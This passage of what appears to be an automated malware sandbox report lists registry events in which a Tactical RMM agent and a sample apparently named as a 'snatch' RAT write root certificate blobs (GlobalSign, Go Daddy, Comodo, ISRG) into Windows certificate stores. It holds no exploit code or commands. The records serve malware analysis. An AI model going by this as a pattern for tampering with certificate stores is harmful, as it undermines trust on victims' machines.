850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 04000000010000001000000091de0625abdafd32170cbb25172a84670f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee419000000010000001000000063664b080559a094d10f0a3c5f4f629020000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 5c00000001000000040000000008000019000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877604000000010000001000000091de0625abdafd32170cbb25172a846720000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
